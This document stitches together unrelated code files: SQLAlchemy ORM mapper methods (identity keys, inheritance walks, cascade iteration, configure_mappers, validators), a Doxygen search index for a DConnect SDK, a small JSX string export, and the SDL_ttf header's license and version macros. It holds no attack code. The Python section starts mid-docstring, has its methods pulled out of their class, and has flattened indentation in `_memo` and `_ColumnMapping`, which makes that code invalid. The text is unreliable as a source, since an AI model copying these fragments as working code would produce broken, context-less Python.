                {tabled.col2}
        }

    """
    result = util.column_dict()

    def visit_binary(binary):
        # record both directions of every col == col comparison
        if binary.operator == operators.eq:
            if binary.left in result:
                result[binary.left].add(binary.right)
            else:
                result[binary.left] = util.column_set((binary.right,))
            if binary.right in result:
                result[binary.right].add(binary.left)
            else:
                result[binary.right] = util.column_set((binary.left,))

    # walk the inherit conditions of the whole hierarchy
    for mapper in self.base_mapper.self_and_descendants:
        if mapper.inherit_condition is not None:
            visitors.traverse(
                mapper.inherit_condition, {}, {"binary": visit_binary}
            )

    return result
def _is_userland_descriptor(self, obj):
    """Return True if ``obj`` is a user-defined descriptor rather
    than one of SQLAlchemy's own instrumentation constructs."""
    sqla_types = (
        _MappedAttribute,
        instrumentation.ClassManager,
        expression.ColumnElement,
    )
    return not isinstance(obj, sqla_types)
def _should_exclude(self, name, assigned_name, local, column):
    """determine whether a particular property should be implicitly
    present on the class.

    This occurs when properties are propagated from an inherited class, or
    are applied from the columns present in the mapped table.

    :param name: the mapped name being considered.
    :param assigned_name: the attribute name as it appears on the class.
    :param local: if True, only inspect the immediate class ``__dict__``;
        otherwise search the full MRO via the class manager.
    :param column: the Column being mapped, or None; matched against the
        include/exclude collections in addition to ``name``.
    """
    # check for class-bound attributes and/or descriptors,
    # either local or from an inherited class
    if local:
        if self.class_.__dict__.get(
            assigned_name, None
        ) is not None and self._is_userland_descriptor(
            self.class_.__dict__[assigned_name]
        ):
            return True
    else:
        attr = self.class_manager._get_class_attr_mro(assigned_name, None)
        if attr is not None and self._is_userland_descriptor(attr):
            return True

    # honor include_properties; either the string name or the Column
    # object itself may appear in the collection
    if (
        self.include_properties is not None
        and name not in self.include_properties
        and (column is None or column not in self.include_properties)
    ):
        self._log("not including property %s" % (name))
        return True

    # honor exclude_properties the same way
    if self.exclude_properties is not None and (
        name in self.exclude_properties
        or (column is not None and column in self.exclude_properties)
    ):
        self._log("excluding property %s" % (name))
        return True

    return False
def common_parent(self, other):
    """Return true if the given mapper shares a
    common inherited parent as this mapper."""
    # base_mapper identity is the root of each inheritance hierarchy
    return other.base_mapper is self.base_mapper
def _canload(self, state, allow_subtypes):
    """Return True if rows for the given state may be loaded by
    this mapper."""
    primary = self.primary_mapper()
    state_mapper = _state_mapper(state)
    # polymorphic mappers (or explicit allowance) accept subtypes;
    # otherwise the state's mapper must be exactly the primary mapper
    if self.polymorphic_on is not None or allow_subtypes:
        return state_mapper.isa(primary)
    return state_mapper is primary
def isa(self, other):
    """Return True if the this mapper inherits from the given mapper."""
    # walk up the inheritance chain until we hit ``other`` or run out
    current = self
    while current and current is not other:
        current = current.inherits
    return bool(current)
def iterate_to_root(self):
    """Yield this mapper followed by each superclass mapper, up to
    the base of the inheritance hierarchy."""
    mapper = self
    while mapper:
        yield mapper
        mapper = mapper.inherits
@_memoized_configured_property
def self_and_descendants(self):
    """The collection including this mapper and all descendant mappers.

    This includes not just the immediately inheriting mappers but
    all their inheriting mappers as well.

    """
    # breadth-first walk of the inheritance tree
    collected = []
    to_visit = deque([self])
    while to_visit:
        current = to_visit.popleft()
        collected.append(current)
        to_visit.extend(current._inheriting_mappers)
    return util.WeakSequence(collected)
def polymorphic_iterator(self):
    """Iterate through the collection including this mapper and
    all descendant mappers.

    This includes not just the immediately inheriting mappers but
    all their inheriting mappers as well.

    To iterate through an entire hierarchy, use
    ``mapper.base_mapper.polymorphic_iterator()``.

    """
    return iter(self.self_and_descendants)
def primary_mapper(self):
    """Return the primary mapper corresponding to this mapper's class key
    (class)."""
    return self.class_manager.mapper
@property
def primary_base_mapper(self):
    # base mapper of the class's primary mapper hierarchy
    return self.class_manager.mapper.base_mapper
def _result_has_identity_key(self, result, adapter=None):
    """Return True if every primary key column (adapted if an adapter
    is given) is present in the result's keys."""
    if adapter:
        pk_cols = [adapter.columns[c] for c in self.primary_key]
    else:
        pk_cols = self.primary_key
    return all(result._has_key(col) for col in pk_cols)
def identity_key_from_row(self, row, identity_token=None, adapter=None):
    """Return an identity-map key for use in storing/retrieving an
    item from the identity map.

    :param row: A :class:`.RowProxy` instance.  The columns which are
     mapped by this :class:`.Mapper` should be locatable in the row,
     preferably via the :class:`.Column` object directly (as is the case
     when a :func:`.select` construct is executed), or via string names of
     the form ``<tablename>_<colname>``.

    """
    if adapter:
        pk_cols = [adapter.columns[c] for c in self.primary_key]
    else:
        pk_cols = self.primary_key
    pk_values = tuple(row[column] for column in pk_cols)
    return (self._identity_class, pk_values, identity_token)
def identity_key_from_primary_key(self, primary_key, identity_token=None):
    """Return an identity-map key for use in storing/retrieving an
    item from an identity map.

    :param primary_key: A list of values indicating the identifier.

    """
    key = (self._identity_class, tuple(primary_key), identity_token)
    return key
def identity_key_from_instance(self, instance):
    """Return the identity key for the given instance, based on
    its primary key attributes.

    If the instance's state is expired, calling this method
    will result in a database check to see if the object has been deleted.
    If the row no longer exists,
    :class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.

    This value is typically also found on the instance state under the
    attribute name `key`.

    """
    # PASSIVE_OFF forces loads of any expired PK attributes
    state = attributes.instance_state(instance)
    return self._identity_key_from_state(
        state, attributes.PASSIVE_OFF
    )
def _identity_key_from_state(
    self, state, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
    """Build (identity_class, pk_value_tuple, identity_token) from
    the state's current primary key attribute values."""
    dict_ = state.dict
    manager = state.manager
    pk_values = [
        manager[prop.key].impl.get(state, dict_, passive)
        for prop in self._identity_key_props
    ]
    return (self._identity_class, tuple(pk_values), state.identity_token)
def primary_key_from_instance(self, instance):
    """Return the list of primary key values for the given
    instance.

    If the instance's state is expired, calling this method
    will result in a database check to see if the object has been deleted.
    If the row no longer exists,
    :class:`~sqlalchemy.orm.exc.ObjectDeletedError` is raised.

    """
    state = attributes.instance_state(instance)
    # the middle element of the identity key is the PK value tuple
    return self._identity_key_from_state(
        state, attributes.PASSIVE_OFF
    )[1]
@_memoized_configured_property
def _identity_key_props(self):
    """MapperProperty objects corresponding to the primary key columns."""
    props = []
    for col in self.primary_key:
        props.append(self._columntoproperty[col])
    return props
@_memoized_configured_property
def _all_pk_props(self):
    """Set of all primary key properties across all mapped tables."""
    pk_props = set()
    for table in self.tables:
        pk_props.update(self._pks_by_table[table])
    return pk_props
@_memoized_configured_property
def _should_undefer_in_wildcard(self):
    """Columns always loaded under a wildcard deferral: the primary
    key, plus the discriminator column when present."""
    undefer_cols = set(self.primary_key)
    if self.polymorphic_on is not None:
        undefer_cols.add(self.polymorphic_on)
    return undefer_cols
@_memoized_configured_property
def _primary_key_propkeys(self):
    """Attribute key names of all primary key properties."""
    return set(prop.key for prop in self._all_pk_props)
def _get_state_attr_by_column(
    self, state, dict_, column, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
    """Return the current attribute value for the property mapped
    to ``column``."""
    prop = self._columntoproperty[column]
    impl = state.manager[prop.key].impl
    return impl.get(state, dict_, passive=passive)
def _set_committed_state_attr_by_column(self, state, dict_, column, value):
    """Set the committed (non-dirty) value for the property mapped
    to ``column``."""
    prop = self._columntoproperty[column]
    impl = state.manager[prop.key].impl
    impl.set_committed_value(state, dict_, value)
def _set_state_attr_by_column(self, state, dict_, column, value):
    """Set the attribute value (as a normal, history-tracked change)
    for the property mapped to ``column``."""
    prop = self._columntoproperty[column]
    impl = state.manager[prop.key].impl
    impl.set(state, dict_, value, None)
def _get_committed_attr_by_column(self, obj, column):
    """Convenience form of _get_committed_state_attr_by_column that
    resolves state/dict from the object itself."""
    state = attributes.instance_state(obj)
    dict_ = attributes.instance_dict(obj)
    return self._get_committed_state_attr_by_column(
        state, dict_, column, passive=attributes.PASSIVE_OFF
    )
def _get_committed_state_attr_by_column(
    self, state, dict_, column, passive=attributes.PASSIVE_RETURN_NEVER_SET
):
    """Return the committed (last-flushed) value for the property
    mapped to ``column``."""
    prop = self._columntoproperty[column]
    impl = state.manager[prop.key].impl
    return impl.get_committed_value(state, dict_, passive=passive)
def _optimized_get_statement(self, state, attribute_names):
    """assemble a WHERE clause which retrieves a given state by primary
    key, using a minimized set of tables.

    Applies to a joined-table inheritance mapper where the
    requested attribute names are only present on joined tables,
    not the base table.  The WHERE clause attempts to include
    only those tables to minimize joins.

    Returns a Select statement, or None when the optimization does
    not apply.
    """
    props = self._props

    # all tables referenced by the requested attributes
    tables = set(
        chain(
            *[
                sql_util.find_tables(c, check_columns=True)
                for key in attribute_names
                for c in props[key].columns
            ]
        )
    )

    if self.base_mapper.local_table in tables:
        # the base table would be needed anyway; nothing to minimize
        return None

    class ColumnsNotAvailable(Exception):
        pass

    def visit_binary(binary):
        # replace references to columns outside the target table set
        # with bound parameters carrying already-loaded values
        leftcol = binary.left
        rightcol = binary.right

        if leftcol is None or rightcol is None:
            return

        if leftcol.table not in tables:
            leftval = self._get_committed_state_attr_by_column(
                state,
                state.dict,
                leftcol,
                passive=attributes.PASSIVE_NO_INITIALIZE,
            )
            if leftval in orm_util._none_set:
                # value not loaded / None; optimization not possible
                raise ColumnsNotAvailable()
            binary.left = sql.bindparam(
                None, leftval, type_=binary.right.type
            )
        elif rightcol.table not in tables:
            rightval = self._get_committed_state_attr_by_column(
                state,
                state.dict,
                rightcol,
                passive=attributes.PASSIVE_NO_INITIALIZE,
            )
            if rightval in orm_util._none_set:
                raise ColumnsNotAvailable()
            binary.right = sql.bindparam(
                None, rightval, type_=binary.right.type
            )

    allconds = []

    try:
        start = False

        # walk from the base mapper downward; begin collecting join
        # conditions once a table in the target set is encountered
        for mapper in reversed(list(self.iterate_to_root())):
            if mapper.local_table in tables:
                start = True
            elif not isinstance(
                mapper.local_table, expression.TableClause
            ):
                # e.g. mapped to a subquery; don't attempt to optimize
                return None

            if start and not mapper.single:
                allconds.append(
                    visitors.cloned_traverse(
                        mapper.inherit_condition,
                        {},
                        {"binary": visit_binary},
                    )
                )
    except ColumnsNotAvailable:
        return None

    cond = sql.and_(*allconds)

    cols = []
    for key in attribute_names:
        cols.extend(props[key].columns)
    return sql.select(cols, cond, use_labels=True)
def _iterate_to_target_viawpoly(self, mapper):
    # Traverse from self toward ``mapper`` along superclass mappers,
    # but only while each successive superclass includes the previous
    # mapper in its with_polymorphic selectable; stop early when that
    # chain breaks or the target is reached.
    if self.isa(mapper):
        prev = self
        for m in self.iterate_to_root():
            yield m

            if m is not prev and prev not in m._with_polymorphic_mappers:
                # chain broken: superclass doesn't render ``prev``
                break

            prev = m

            if m is mapper:
                break
def _should_selectin_load(self, enabled_via_opt, polymorphic_from):
    """Return the mapper (or option entity) whose "selectin"
    polymorphic load applies to this mapper, or None.

    :param enabled_via_opt: collection of entities for which selectin
        loading was enabled via query options, or falsy when only
        mapper-level ``polymorphic_load`` settings apply.
    :param polymorphic_from: the mapper from which the polymorphic
        load is proceeding.
    """
    if not enabled_via_opt:
        # common case, takes place for all polymorphic loads
        mapper = polymorphic_from
        for m in self._iterate_to_target_viawpoly(mapper):
            if m.polymorphic_load == "selectin":
                return m
    else:
        # uncommon case, selectin load options were used
        enabled_via_opt = set(enabled_via_opt)
        enabled_via_opt_mappers = {e.mapper: e for e in enabled_via_opt}

        for entity in enabled_via_opt.union([polymorphic_from]):
            mapper = entity.mapper
            for m in self._iterate_to_target_viawpoly(mapper):
                if (
                    m.polymorphic_load == "selectin"
                    or m in enabled_via_opt_mappers
                ):
                    # prefer the option's original entity (e.g. an
                    # aliased class) over the bare mapper
                    return enabled_via_opt_mappers.get(m, m)

    return None
@util.dependencies(
    "sqlalchemy.ext.baked", "sqlalchemy.orm.strategy_options"
)
def _subclass_load_via_in(self, baked, strategy_options, entity):
    """Assemble a BakedQuery that can load the columns local to
    this subclass as a SELECT with IN.

    ``baked`` and ``strategy_options`` are injected by the
    @util.dependencies decorator; callers pass only ``entity``.
    Returns a (baked_query, enable_opt, disable_opt) triple.
    """
    assert self.inherits

    polymorphic_prop = self._columntoproperty[self.polymorphic_on]
    keep_props = set([polymorphic_prop] + self._identity_key_props)

    disable_opt = strategy_options.Load(entity)
    enable_opt = strategy_options.Load(entity)

    for prop in self.attrs:
        if prop.parent is self or prop in keep_props:
            # "enable" options, to turn on the properties that we want to
            # load by default (subject to options from the query)
            enable_opt.set_generic_strategy(
                (prop.key,), dict(prop.strategy_key)
            )
        else:
            # "disable" options, to turn off the properties from the
            # superclass that we *don't* want to load, applied after
            # the options from the query to override them
            disable_opt.set_generic_strategy(
                (prop.key,), {"do_nothing": True}
            )

    if len(self.primary_key) > 1:
        # composite primary key: compare as a tuple
        in_expr = sql.tuple_(*self.primary_key)
    else:
        in_expr = self.primary_key[0]

    if entity.is_aliased_class:
        assert entity.mapper is self

        q = baked.BakedQuery(
            self._compiled_cache,
            lambda session: session.query(entity)
            .select_entity_from(entity.selectable)
            ._adapt_all_clauses(),
            (self,),
        )
        # aliased entities aren't safely cacheable; spoil the bake
        q.spoil()
    else:
        q = baked.BakedQuery(
            self._compiled_cache,
            lambda session: session.query(self),
            (self,),
        )

    q += lambda q: q.filter(
        in_expr.in_(sql.bindparam("primary_keys", expanding=True))
    ).order_by(*self.primary_key)

    return q, enable_opt, disable_opt
@_memoized_configured_property
def _subclass_load_via_in_mapper(self):
    # memoized form of _subclass_load_via_in() with this mapper itself
    # as the entity; _subclass_load_via_in's @util.dependencies
    # decorator supplies its first two arguments
    return self._subclass_load_via_in(self)
def cascade_iterator(self, type_, state, halt_on=None):
    """Iterate each element and its mapper in an object graph,
    for all relationships that meet the given cascade rule.

    :param type_:
      The name of the cascade rule (i.e. ``"save-update"``, ``"delete"``,
      etc.).

      .. note::  the ``"all"`` cascade is not accepted here.  For a generic
         object traversal function, see :ref:`faq_walk_objects`.

    :param state:
      The lead InstanceState.  child items will be processed per
      the relationships defined for this object's mapper.

    :return: the method yields individual object instances.

    .. seealso::

        :ref:`unitofwork_cascades`

        :ref:`faq_walk_objects` - illustrates a generic function to
        traverse all objects without relying on cascades.

    """
    visited_states = set()
    # sentinel markers distinguishing the two kinds of stack entries:
    # prp = a deque of MapperProperty objects still to examine;
    # mpp = a deque of (instance, mapper, state, dict) tuples produced
    # by a property's cascade_iterator()
    prp, mpp = object(), object()

    assert state.mapper.isa(self)

    # depth-first traversal via an explicit stack of iterators
    visitables = deque(
        [(deque(state.mapper._props.values()), prp, state, state.dict)]
    )

    while visitables:
        iterator, item_type, parent_state, parent_dict = visitables[-1]
        if not iterator:
            # exhausted; pop back up a level
            visitables.pop()
            continue

        if item_type is prp:
            prop = iterator.popleft()
            if type_ not in prop.cascade:
                continue
            # expand this property into its cascaded child objects
            queue = deque(
                prop.cascade_iterator(
                    type_,
                    parent_state,
                    parent_dict,
                    visited_states,
                    halt_on,
                )
            )
            if queue:
                visitables.append((queue, mpp, None, None))
        elif item_type is mpp:
            (
                instance,
                instance_mapper,
                corresponding_state,
                corresponding_dict,
            ) = iterator.popleft()
            yield (
                instance,
                instance_mapper,
                corresponding_state,
                corresponding_dict,
            )
            # recurse into the child instance's own properties
            visitables.append(
                (
                    deque(instance_mapper._props.values()),
                    prp,
                    corresponding_state,
                    corresponding_dict,
                )
            )
@_memoized_configured_property
def _compiled_cache(self):
    # per-mapper LRU cache of compiled statements
    return util.LRUCache(self._compiled_cache_size)
@_memoized_configured_property
def _sorted_tables(self):
    # OrderedDict of table -> mapper across the full inheritance
    # hierarchy, ordered by FK/inheritance dependency.
    table_to_mapper = {}

    for mapper in self.base_mapper.self_and_descendants:
        for t in mapper.tables:
            table_to_mapper.setdefault(t, mapper)

    # force superclass tables to sort ahead of subclass tables
    extra_dependencies = []
    for table, mapper in table_to_mapper.items():
        super_ = mapper.inherits
        if super_:
            extra_dependencies.extend(
                [(super_table, table) for super_table in super_.tables]
            )

    def skip(fk):
        # attempt to skip dependencies that are not
        # significant to the inheritance chain
        # for two tables that are related by inheritance.
        # while that dependency may be important, it's technically
        # not what we mean to sort on here.
        parent = table_to_mapper.get(fk.parent.table)
        dep = table_to_mapper.get(fk.column.table)

        if (
            parent is not None
            and dep is not None
            and dep is not parent
            and dep.inherit_condition is not None
        ):
            cols = set(sql_util._find_columns(dep.inherit_condition))
            if parent.inherit_condition is not None:
                cols = cols.union(
                    sql_util._find_columns(parent.inherit_condition)
                )
                return fk.parent not in cols and fk.column not in cols
            else:
                return fk.parent not in cols
        return False

    sorted_ = sql_util.sort_tables(
        table_to_mapper,
        skip_fn=skip,
        extra_dependencies=extra_dependencies,
    )

    ret = util.OrderedDict()
    for t in sorted_:
        ret[t] = table_to_mapper[t]
    return ret
def _memo(self, key, callable_):
if key in self._memoized_values:
return self._memoized_values[key]
else:
self._memoized_values[key] = value = callable_()
return value
@util.memoized_property
def _table_to_equated(self):
    """memoized map of tables to collections of columns to be
    synchronized upwards to the base mapper."""
    result = util.defaultdict(list)
    for table in self._sorted_tables:
        table_cols = set(table.c)
        for mapper_ in self.iterate_to_root():
            pairs = mapper_._inherits_equated_pairs
            if not pairs:
                continue
            # union of all proxy sets on the "local" side of the
            # inherit-condition column pairs
            proxied = util.reduce(
                set.union, [l.proxy_set for l, r in pairs]
            )
            if table_cols.intersection(proxied):
                result[table].append((mapper_, pairs))
    return result
def configure_mappers():
    """Initialize the inter-mapper relationships of all mappers that
    have been constructed thus far.

    This function can be called any number of times, but in
    most cases is invoked automatically, the first time mappings are used,
    as well as whenever mappings are used and additional not-yet-configured
    mappers have been constructed.

    Points at which this occurs include when a mapped class is instantiated
    into an instance, as well as when the :meth:`.Session.query` method
    is used.

    The :func:`.configure_mappers` function provides several event hooks
    that can be used to augment its functionality. These methods include:

    * :meth:`.MapperEvents.before_configured` - called once before
      :func:`.configure_mappers` does any work; this can be used to establish
      additional options, properties, or related mappings before the operation
      proceeds.

    * :meth:`.MapperEvents.mapper_configured` - called as each individual
      :class:`.Mapper` is configured within the process; will include all
      mapper state except for backrefs set up by other mappers that are still
      to be configured.

    * :meth:`.MapperEvents.after_configured` - called once after
      :func:`.configure_mappers` is complete; at this stage, all
      :class:`.Mapper` objects that are known to SQLAlchemy will be fully
      configured. Note that the calling application may still have other
      mappings that haven't been produced yet, such as if they are in modules
      as yet unimported.

    """
    # fast path: nothing new to configure
    if not Mapper._new_mappers:
        return
    _CONFIGURE_MUTEX.acquire()
    try:
        global _already_compiling
        # reentrancy guard: a configure pass may itself trigger mapper use
        if _already_compiling:
            return
        _already_compiling = True
        try:
            # double-check inside mutex
            if not Mapper._new_mappers:
                return
            has_skip = False
            Mapper.dispatch._for_class(Mapper).before_configured()
            # initialize properties on all mappers
            # note that _mapper_registry is unordered, which
            # may randomly conceal/reveal issues related to
            # the order of mapper compilation
            for mapper in list(_mapper_registry):
                run_configure = None
                for fn in mapper.dispatch.before_mapper_configured:
                    run_configure = fn(mapper, mapper.class_)
                    if run_configure is EXT_SKIP:
                        # a hook opted this mapper out; remember so we
                        # don't clear the "new mappers" flag below
                        has_skip = True
                        break
                if run_configure is EXT_SKIP:
                    continue
                if getattr(mapper, "_configure_failed", False):
                    # a previous pass already failed on this mapper;
                    # re-raise with the original cause attached
                    e = sa_exc.InvalidRequestError(
                        "One or more mappers failed to initialize - "
                        "can't proceed with initialization of other "
                        "mappers. Triggering mapper: '%s'. "
                        "Original exception was: %s"
                        % (mapper, mapper._configure_failed)
                    )
                    e._configure_failed = mapper._configure_failed
                    raise e
                if not mapper.configured:
                    try:
                        mapper._post_configure_properties()
                        mapper._expire_memoizations()
                        mapper.dispatch.mapper_configured(
                            mapper, mapper.class_
                        )
                    except Exception:
                        exc = sys.exc_info()[1]
                        # record the failure so later passes can report it
                        if not hasattr(exc, "_configure_failed"):
                            mapper._configure_failed = exc
                        raise
            if not has_skip:
                Mapper._new_mappers = False
        finally:
            _already_compiling = False
    finally:
        _CONFIGURE_MUTEX.release()
    # fired outside the mutex, once per successful/attempted pass
    Mapper.dispatch._for_class(Mapper).after_configured()
def reconstructor(fn):
    """Decorate a method as the 'reconstructor' hook.

    Designates a method as the "reconstructor", an ``__init__``-like
    method that will be called by the ORM after the instance has been
    loaded from the database or otherwise reconstituted.

    The reconstructor will be invoked with no arguments. Scalar
    (non-collection) database-mapped attributes of the instance will
    be available for use within the function. Eagerly-loaded
    collections are generally not yet available and will usually only
    contain the first element. ORM state changes made to objects at
    this stage will not be recorded for the next flush() operation, so
    the activity within a reconstructor should be conservative.

    .. seealso::

        :ref:`mapping_constructors`

        :meth:`.InstanceEvents.load`

    """
    setattr(fn, "__sa_reconstructor__", True)
    return fn
def validates(*names, **kw):
    r"""Decorate a method as a 'validator' for one or more named properties.

    Designates a method as a validator, a method which receives the
    name of the attribute as well as a value to be assigned, or in the
    case of a collection, the value to be added to the collection.
    The function can then raise validation exceptions to halt the
    process from continuing (where Python's built-in ``ValueError``
    and ``AssertionError`` exceptions are reasonable choices), or can
    modify or replace the value before proceeding. The function should
    otherwise return the given value.

    Note that a validator for a collection **cannot** issue a load of that
    collection within the validation routine - this usage raises
    an assertion to avoid recursion overflows. This is a reentrant
    condition which is not supported.

    :param \*names: list of attribute names to be validated.
    :param include_removes: if True, "remove" events will be
      sent as well - the validation function must accept an additional
      argument "is_remove" which will be a boolean.

      .. versionadded:: 0.7.7

    :param include_backrefs: defaults to ``True``; if ``False``, the
      validation function will not emit if the originator is an attribute
      event related via a backref. This can be used for bi-directional
      :func:`.validates` usage where only one validator should emit per
      attribute operation.

      .. versionadded:: 0.9.0

    .. seealso::

        :ref:`simple_validators` - usage examples for :func:`.validates`

    """
    # pull the recognized options out of **kw; anything else is ignored,
    # matching the historical behavior of this decorator
    include_removes = kw.pop("include_removes", False)
    include_backrefs = kw.pop("include_backrefs", True)

    def decorate(fn):
        # each decorated function gets its own options dict
        fn.__sa_validators__ = names
        fn.__sa_validation_opts__ = dict(
            include_removes=include_removes,
            include_backrefs=include_backrefs,
        )
        return fn

    return decorate
def _event_on_load(state, ctx):
    # Invoke the mapped class's designated @reconstructor hook, if one
    # was declared, each time an instance is loaded/reconstituted.
    mapper = state.manager.info[_INSTRUMENTOR]
    hook = mapper._reconstructor
    if hook:
        hook(state.obj())
def _event_on_first_init(manager, cls):
    """Initial mapper compilation trigger.

    instrumentation calls this one when InstanceState
    is first generated, and is needed for legacy mutable
    attributes to work.
    """
    mapper = manager.info.get(_INSTRUMENTOR)
    if mapper and Mapper._new_mappers:
        configure_mappers()
def _event_on_init(state, args, kwargs):
    """Run init_instance hooks.

    This also includes mapper compilation, normally not needed
    here but helps with some piecemeal configuration
    scenarios (such as in the ORM tutorial).
    """
    mapper = state.manager.info.get(_INSTRUMENTOR)
    if not mapper:
        return
    if Mapper._new_mappers:
        configure_mappers()
    setter = mapper._set_polymorphic_identity
    if setter:
        setter(state)
class _ColumnMapping(dict):
"""Error reporting helper for mapper._columntoproperty."""
__slots__ = ("mapper",)
def __init__(self, mapper):
self.mapper = mapper
def __missing__(self, column):
prop = self.mapper._props.get(column)
if prop:
raise orm_exc.UnmappedColumnError(
"Column '%s.%s' is not available, due to "
"conflicting property '%s':%r"
% (column.table.name, column.name, column.key, prop)
)
raise orm_exc.UnmappedColumnError(
"No column %s is configured on mapper %s..."
% (column, self.mapper)
)
|
/* Doxygen-generated search index: each entry maps a lower-cased,
   URL-encoded symbol name to its display name and the documentation
   page anchor(s) where it is defined. Auto-generated - do not edit. */
var searchData=
[
['refreshaccesstokenwithclientid_3aorigin_3aappname_3ascopes_3asuccess_3aerror_3a',['refreshAccessTokenWithClientId:origin:appName:scopes:success:error:',['../df/d9b/interface_d_connect_util.html#a7ff60c6dbb49d5f5cc1d2b8fb88ca38b',1,'DConnectUtil']]],
['registereventwithrequest_3aresponsehandler_3amessagehandler_3a',['registerEventWithRequest:responseHandler:messageHandler:',['../da/d20/interface_d_connect_event_helper.html#adc56ee6b08ce436c5ff8a8eff23623bf',1,'DConnectEventHelper']]],
['removeall',['removeAll',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a2055865a5e52ee1bd0f9bc92b41c2058',1,'DConnectEventCacheController -p::removeAll()'],['../de/dcb/interface_d_connect_event_manager.html#a5f122d2d0381720dd82c7bbd4ab0a47a',1,'DConnectEventManager::removeAll()']]],
['removeallservices',['removeAllServices',['../d2/d95/interface_d_connect_service_provider.html#a5843305260efff300ff4648130474c48',1,'DConnectServiceProvider']]],
['removeapi_3a',['removeApi:',['../d6/d26/interface_d_connect_profile.html#aed859143bfad17e74db13ca725256044',1,'DConnectProfile']]],
['removebutton',['removeButton',['../da/d40/interface_d_connect_service_list_view_controller.html#aca602056738d3bed761eca7d86bbbe7a',1,'DConnectServiceListViewController']]],
['removeevent_3a',['removeEvent:',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a6bfbf65a312578f882e0169a9754ad15',1,'DConnectEventCacheController -p']]],
['removeeventforrequest_3a',['removeEventForRequest:',['../de/dcb/interface_d_connect_event_manager.html#af412d2301e4cdb1bd9b69d639421b0e4',1,'DConnectEventManager']]],
['removeeventsfororigin_3a',['removeEventsForOrigin:',['../d4/d3f/protocol_d_connect_event_cache_controller_01-p.html#a8cf241e326d0d5455bddeaa8050a4cf8',1,'DConnectEventCacheController -p::removeEventsForOrigin:()'],['../de/dcb/interface_d_connect_event_manager.html#a327571eb8bc35b8aa62a13ba33733133',1,'DConnectEventManager::removeEventsForOrigin:()']]],
['removefileforpath_3a',['removeFileForPath:',['../d2/d0f/interface_d_connect_file_manager.html#a63451d20135499fbcc85a114ebd66309',1,'DConnectFileManager']]],
['removeprofile_3a',['removeProfile:',['../d4/de4/interface_d_connect_profile_provider.html#af7f67effc7a9bfa543be89d074331bd5',1,'DConnectProfileProvider']]],
['removeservice_3a',['removeService:',['../d2/d95/interface_d_connect_service_provider.html#ac5ae7b33b6f9298d91d86bc740e278fa',1,'DConnectServiceProvider']]],
['removeservicelistener_3a',['removeServiceListener:',['../d2/d95/interface_d_connect_service_provider.html#aa96e84eac9a5135830dede88b38aaf97',1,'DConnectServiceProvider']]],
['requestformessage_3a',['requestForMessage:',['../d2/d91/interface_d_connect_message_factory.html#a22ce1696aa2fbe8d7825cab1777802a9',1,'DConnectMessageFactory']]],
['requestparamspeclist',['requestParamSpecList',['../dd/d67/interface_d_connect_api_spec.html#a0075b1cb9eec5380a44a4d78a0bb4931',1,'DConnectApiSpec']]],
['requiresorigin',['requiresOrigin',['../d0/d4e/interface_d_connect_manager.html#ac2fb952347cecf1068e6b74608a75366',1,'DConnectManager']]],
['result',['result',['../df/d9a/interface_d_connect_response_message.html#ace2c16849bba75fc274a940720e2e048',1,'DConnectResponseMessage']]]
];
|
// JSX source exported as a plain string (e.g. for display in a code
// viewer). The template literal's whitespace is part of the displayed
// text, so do not reformat its contents.
const code = `<div className='App'>
<Windows
dashboard={dashboard}
windows={{ ...this.props.windows }}
onClose={this.props.removeWindow}
order={this.props.order}
active={this.props.active}
setActive={this.props.setActive}
/>
</div>`
export default code
|
/*
SDL_ttf: A companion library to SDL for working with TrueType (tm) fonts
Copyright (C) 2001-2022 Sam Lantinga <[email protected]>
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
*/
/* This library is a wrapper around the excellent FreeType 2.0 library,
available at:
http://www.freetype.org/
*/
/* Note: In many places, SDL_ttf will say "glyph" when it means "code point."
Unicode is hard, we learn as we go, and we apologize for adding to the
confusion. */
#ifndef SDL_TTF_H_
#define SDL_TTF_H_
#include "SDL.h"
#include "begin_code.h"
/* Set up for C function definitions, even when using C++ */
#ifdef __cplusplus
extern "C" {
#endif
/* Printable format: "%d.%d.%d", MAJOR, MINOR, PATCHLEVEL
*/
#define SDL_TTF_MAJOR_VERSION 2
#define SDL_TTF_MINOR_VERSION 0
#define SDL_TTF_PATCHLEVEL 18
/* This macro can be used to fill a version structure with the compile-time
* version of the SDL_ttf library.
*/
#define SDL_TTF_VERSION(X) \
{ \
(X)->major = SDL_TTF_MAJOR_VERSION; \
(X)->minor = SDL_TTF_MINOR_VERSION; \
(X)->patch = SDL_TTF_PATCHLEVEL; \
}
/* Backwards compatibility */
#define TTF_MAJOR_VERSION SDL_TTF_MAJOR_VERSION
#define TTF_MINOR_VERSION SDL_TTF_MINOR_VERSION
#define TTF_PATCHLEVEL SDL_TTF_PATCHLEVEL
#define TTF_VERSION(X) SDL_TTF_VERSION(X)
/**
* This is the version number macro for the current SDL_ttf version.
*/
#define SDL_TTF_COMPILEDVERSION \
SDL_VERSIONNUM(SDL_TTF_MAJOR_VERSION, SDL_TTF_MINOR_VERSION, SDL_TTF_PATCHLEVEL)
/**
* This macro will evaluate to true if compiled with SDL_ttf at least X.Y.Z.
*/
#define SDL_TTF_VERSION_ATLEAST(X, Y, Z) \
(SDL_TTF_COMPILEDVERSION >= SDL_VERSIONNUM(X, Y, Z))
/* Make sure this is defined (only available in newer SDL versions) */
#ifndef SDL_DEPRECATED
#define SDL_DEPRECATED
#endif
/* This function gets the version of the dynamically linked SDL_ttf library.
it should NOT be used to fill a version structure, instead you should
use the SDL_TTF_VERSION() macro.
*/
extern DECLSPEC const SDL_version * SDLCALL TTF_Linked_Version(void);
/* This function stores the version of the FreeType2 library in use.
TTF_Init() should be called before calling this function.
*/
extern DECLSPEC void SDLCALL TTF_GetFreeTypeVersion(int *major, int *minor, int *patch);
/* This function stores the version of the HarfBuzz library in use,
or 0 if HarfBuzz is not available.
*/
extern DECLSPEC void SDLCALL TTF_GetHarfBuzzVersion(int *major, int *minor, int *patch);
